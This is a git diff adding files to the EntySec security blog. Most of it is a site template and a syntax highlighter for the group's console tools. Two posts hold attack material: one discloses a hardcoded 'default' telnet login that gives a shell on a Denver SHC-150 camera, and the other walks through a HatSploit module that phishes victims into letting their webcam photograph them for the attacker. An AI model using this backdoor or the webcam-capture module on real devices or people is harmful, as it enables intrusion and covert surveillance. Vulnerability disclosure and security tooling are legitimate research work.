EntySec
diff --git a/‎_includes/head.html‎
Lines changed: 129 additions & 0 deletions b/‎_includes/head.html‎
Lines changed: 129 additions & 0 deletions
diff --git a/‎_plugins/entysec.rb‎
Lines changed: 82 additions & 0 deletions b/‎_plugins/entysec.rb‎
Lines changed: 82 additions & 0 deletions
diff --git a/‎_posts/2021-07-28-denver-backdoors.md‎
Lines changed: 48 additions & 0 deletions b/‎_posts/2021-07-28-denver-backdoors.md‎
Lines changed: 48 additions & 0 deletions
diff --git a/‎_posts/2022-03-13-webcam-photo-phishing.md‎
Lines changed: 97 additions & 0 deletions b/‎_posts/2022-03-13-webcam-photo-phishing.md‎
Lines changed: 97 additions & 0 deletions
@@ -0,0 +1,129 @@
+<head>
+  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
+  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
+  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
+  <meta name="mobile-web-app-capable" content="yes">
+  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
+  <meta
+    name="viewport"
+    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
+  >
+
+  {%- capture seo_tags -%}
+    {% seo title=false %}
+  {%- endcapture -%}
+
+  <!-- Setup Open Graph image -->
+
+  {% if page.image %}
+    {% assign src = page.image.path | default: page.image %}
+
+    {% unless src contains '://' %}
+      {%- capture img_url -%}
+        {% include media-url.html src=src subpath=page.media_subpath absolute=true %}
+      {%- endcapture -%}
+
+      {%- capture old_url -%}{{ src | absolute_url }}{%- endcapture -%}
+      {%- capture new_url -%}{{ img_url }}{%- endcapture -%}
+
+      {% assign seo_tags = seo_tags | replace: old_url, new_url %}
+    {% endunless %}
+
+  {% elsif site.social_preview_image %}
+    {%- capture img_url -%}
+      {% include media-url.html src=site.social_preview_image absolute=true %}
+    {%- endcapture -%}
+
+    {%- capture og_image -%}
+      <meta property="og:image" content="{{ img_url }}" />
+    {%- endcapture -%}
+
+    {%- capture twitter_image -%}
+      <meta name="twitter:card" content="summary_large_image" />
+      <meta property="twitter:image" content="{{ img_url }}" />
+    {%- endcapture -%}
+
+    {% assign old_meta_clip = '<meta name="twitter:card" content="summary" />' %}
+    {% assign new_meta_clip = og_image | append: twitter_image %}
+    {% assign seo_tags = seo_tags | replace: old_meta_clip, new_meta_clip %}
+  {% endif %}
+
+  {{ seo_tags }}
+
+  <title>
+    {%- unless page.layout == 'home' -%}
+      {{ page.title | append: ' | ' }}
+    {%- endunless -%}
+    {{ site.title }}
+  </title>
+
+  {% include_cached favicons.html %}
+
+  <!-- Resource Hints -->
+  {% unless site.assets.self_host.enabled %}
+    {% for hint in site.data.origin.cors.resource_hints %}
+      {% for link in hint.links %}
+        <link rel="{{ link.rel }}" href="{{ hint.url }}" {{ link.opts | join: ' ' }}>
+      {% endfor %}
+    {% endfor %}
+  {% endunless %}
+
+  <!-- Bootstrap -->
+  {% unless jekyll.environment == 'production' %}
+    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css">
+  {% endunless %}
+
+  <!-- Theme style -->
+  <link rel="stylesheet" href="{{ '/assets/css/:THEME.css' | replace: ':THEME', site.theme | relative_url }}">
+
+  <!-- Web Font -->
+  <link rel="stylesheet" href="{{ site.data.origin[type].webfonts | relative_url }}">
+
+  <!-- Font Awesome Icons -->
+  <link rel="stylesheet" href="{{ site.data.origin[type].fontawesome.css | relative_url }}">
+
+  <!-- 3rd-party Dependencies -->
+
+  {% if site.toc and page.toc %}
+    <link rel="stylesheet" href="{{ site.data.origin[type].toc.css | relative_url }}">
+  {% endif %}
+
+  {% if page.layout == 'post' or page.layout == 'page' or page.layout == 'home' %}
+    <link rel="stylesheet" href="{{ site.data.origin[type]['lazy-polyfill'].css | relative_url }}">
+  {% endif %}
+
+  {% if page.layout == 'page' or page.layout == 'post' %}
+    <!-- Image Popup -->
+    <link rel="stylesheet" href="{{ site.data.origin[type].glightbox.css | relative_url }}">
+  {% endif %}
+
+  <!-- Scripts -->
+
+  {% unless site.theme_mode %}
+    <script src="{{ '/assets/js/dist/theme.min.js' | relative_url }}"></script>
+  {% endunless %}
+
+  {% include js-selector.html lang=lang %}
+
+  {% if jekyll.environment == 'production' %}
+    <!-- PWA -->
+    {% if site.pwa.enabled %}
+      <script
+        defer
+        src="{{ '/app.min.js' | relative_url }}?baseurl={{ site.baseurl | default: '' }}&register={{ site.pwa.cache.enabled }}"
+      ></script>
+    {% endif %}
+
+    <!-- Web Analytics -->
+    {% for analytics in site.analytics %}
+      {% capture str %}{{ analytics }}{% endcapture %}
+      {% assign platform = str | split: '{' | first %}
+      {% if site.analytics[platform].id and site.analytics[platform].id != empty %}
+        {% include analytics/{{ platform }}.html %}
+      {% endif %}
+    {% endfor %}
+  {% endif %}
+
+  {% include metadata-hook.html %}
+  <link rel="stylesheet" href="{% link assets/main.css %}">
+</head>
@@ -0,0 +1,82 @@
+require 'rouge'
+
+module Rouge
+  module Tokens
+    def self.token(name, shortname, &b)
+      tok = Token.make_token(name, shortname, &b)
+      const_set(name, tok)
+    end
+
+    SHORTNAME = 'z'
+
+    token :EntySec, SHORTNAME do
+      token :Prompt, "#{SHORTNAME}p"
+      token :Error, "#{SHORTNAME}e"
+      token :Good, "#{SHORTNAME}g"
+      token :Status, "#{SHORTNAME}s"
+      token :Warning, "#{SHORTNAME}w"
+      token :Info, "#{SHORTNAME}i"
+    end
+  end
+
+  module Lexers
+    class EntySecConsoleLanguage < Rouge::RegexLexer
+      title 'entysec'
+      tag 'entysec'
+      desc 'EntySec Console Highlighter'
+      filenames []
+      mimetypes []
+
+      def self.keywords
+        @keywords ||= Set.new %w()
+      end
+
+      state :whitespace do
+        rule %r/\s+/, Text
+      end
+
+      state :root do
+        mixin :whitespace
+
+        rule %r{^(pwny:)}, Text, :pwny_prompt
+        rule %r{^\[-\]}, Tokens::EntySec::Error
+        rule %r{^\[\+\]}, Tokens::EntySec::Good
+        rule %r{^\[\*\]}, Tokens::EntySec::Status
+        rule %r{^\[\!\]}, Tokens::EntySec::Warning
+        rule %r{^(\[i\]|\[\?\]|\[>\])}, Tokens::EntySec::Info
+        rule %r{^(\[)}, Text, :hsf_prompt
+        rule %r{^(\()}, Text, :regular_prompt
+        rule %r{.+}, Text
+      end
+
+      state :regular_prompt do
+        mixin :whitespace
+
+        rule %r{ghost|seashell}, Tokens::EntySec::Prompt
+        rule %r{:}, Punctuation
+        rule %r{[.\w/-]+}, Tokens::EntySec::Error
+        rule %r{\)}, Punctuation
+        rule %r{>}, Punctuation, :pop!
+      end
+
+      state :hsf_prompt do
+        mixin :whitespace
+
+        rule %r{hsf\d?}, Tokens::EntySec::Warning
+        rule %r{exploit|auxiliary|post}, Text
+        rule %r{:}, Punctuation
+        rule %r{\]}, Punctuation
+        rule %r{[.\w/-]+}, Tokens::EntySec::Error
+        rule %r{>}, Punctuation, :pop!
+      end
+
+      state :pwny_prompt do
+        mixin :whitespace
+
+        rule %r{(/[\w/]*)(?=\s)}, Tokens::EntySec::Prompt
+        rule %r{(\w+)}, Tokens::EntySec::Status
+        rule %r{\$|\#}, Punctuation, :pop!
+      end
+    end
+  end
+end
@@ -0,0 +1,48 @@
+---
+title: Denver SHC-150 Camera Backdoor
+categories: [Exploitation]
+tags: [research, backdoor, iot]
+---
+
+<p align="center">
+  <img width="100%" src="/assets/img/shc-150-specs.png">
+</p>
+
+Backdoor was found in a Denver SHC-150 Smart Wifi Camera by Ivan Nikolsky, security researcher from EntySec.
+
+> I bought this model of wifi camera in the shop and before setting it up, checked it for vulnerabilities and backdoors.
+> I scanned this camera for open ports and noticed that telnet service is running on port 23. I brute-forced credentials and logged right to the shell.
+> There is no way to close this port or change credentials - they are hardcoded. Maybe other models also have this backdoor too, I am not sure.
+>
+> -- <cite>Ivan Nikolskiy</cite>
+
+So, the telnet service, as Ivan noticed, has hardcoded credentials and after brute-forcing them he found out that the only thing which is needed to login is username - `default`.
+
+```shell
+enty8080@Ivans-Air ~ % telnet 192.168.2.118 23
+Trying 192.168.2.118...
+Connected to pc192-168-2-118.
+Escape character is '^]'.
+
+goke login: default
+$ ls /
+bin      home     linuxrc  opt      run      tmp
+dev      init     media    proc     sbin     usr
+etc      lib      mnt      root     sys      var
+$ pwd
+/home/default
+$ exit
+Connection closed by foreign host.
+enty8080@Ivans-Air ~ %
+```
+
+As you can see, successfull login leads to the shell of the camera. Also he found out that Denver SHC-150 Smart Wifi Camera runs on `armle` CPU and has `r/w` filesystem.
+
+> So, backdoor is a factory telnet credential - `default`.
+> Just open the telnet connection with the camera on port 23 and enter `default`.
+> After this, you'll get a Linux shell.
+> Backdoor allows an attacker to execute commands on OS lever through telnet.
+>
+> -- <cite>Ivan Nikolskiy</cite>
+
+Ivan has already posted this research [here](https://www.exploit-db.com/exploits/50160).
@@ -0,0 +1,97 @@
+---
+title: Webcam Photo Phishing
+categories: [Exploitation]
+tags: [hatsploit, phishing]
+---
+
+Phishing is a common technique used by attackers to gain access to sensitive information through methods like social engineering. Attackers often attempt to obtain credentials, password hashes, location data, and other critical information by tricking users into revealing this data.
+
+In the HatSploit Framework, EntySec has implemented several modules specifically designed to target a victim’s webcam. These modules allow attackers to take a photo using the target's webcam through a browser and save the captured image as loot on the attacker's machine. Additionally, attackers can stream the webcam footage in real-time. These modules are named `exploit/generic/gather/browser_webcam_photo` and `exploit/generic/gather/browser_webcam_stream`.
+
+Here’s how you can access and use these modules:
+
+```entysec
+[hsf3]> search webcam
+
+Modules:
+
+    Number    Category    Module                                          Rank    Name
+    0         exploit     exploit/generic/gather/browser_webcam_photo     low     Gather Browser Webcam Photo
+    1         exploit     exploit/generic/gather/browser_webcam_stream    low     Gather Browser Webcam Stream
+```
+
+## Using the module
+
+Once you have identified the desired module, you can use it within the HatSploit Framework and set the appropriate options.
+
+For example, to use the `Gather Browser Webcam Photo` module:
+
+```entysec
+[hsf]> use 0
+[hsf3: Gather Browser Webcam Photo]> info
+
+    Name: Gather Browser Webcam Photo
+  Module: exploit/generic/gather/browser_webcam_photo
+Platform: generic
+    Rank: low
+
+Authors:
+  Ivan Nikolskiy (enty8080) - module developer
+
+Description:
+  This module generates a webpage that, when accessed by a victim, attempts to capture an image using the built-in webcam and send it to the attacker.
+
+References:
+  URL: https://blog.entysec.com/2022-03-13-webcam-photo-phishing/
+
+Stability:
+  This module is stable and does not crash the target.
+```
+
+## Configuring the module
+
+You will need to configure several options before running the module:
+
+```entysec
+[hsf3: Gather Browser Webcam Photo]> options
+
+Module Options (exploit/generic/gather/browser_webcam_photo):
+
+    Option     Value                                          Required    Description
+    HOST                                                      yes         HTTP host.
+    MESSAGE    Grant Access                                   yes         Message to display.
+    PATH       /Users/felix/.hsf/loot/zIlWzaKkC9x28XX7.png    yes         Path to save file.
+    PORT       80                                             yes         HTTP port.
+    SSL        no                                             no          Use SSL.
+    TIMEOUT    10                                             no          Connection timeout.
+    URLPATH    /                                              yes         File path on server.
+```
+
+## Running the module
+
+After configuring the options, you can start the web server and wait for the victim to access the malicious webpage. The module will continue to capture images from the victim’s webcam until it is manually interrupted.
+
+Here’s an example:
+
+```entysec
+[hsf3: Gather Browser Webcam Photo]> set host localhost
+[i] host => localhost
+[hsf3: Gather Browser Webcam Photo]> set port 8080
+[i] port => 8080
+[hsf3: Gather Browser Webcam Photo]> run
+
+[*] Starting HTTP listener on port 8080...
+[*] Delivering payload...
+[*] Taking webcam photo...
+[*] Taking webcam photo...
+[*] Taking webcam photo...
+[*] Taking webcam photo...
+[*] Taking webcam photo...
+[*] Taking webcam photo...
+[*] Taking webcam photo...
+[!] Exploit module interrupted.
+```
+
+This module will continue to capture and update the photo file saved in the loot directory until you stop it manually with keyboard interrupt (Ctrl-C).
+
+By utilizing this module, attackers can gain access to sensitive webcam data through the use of phishing techniques, making it an essential tool in the HatSploit Framework.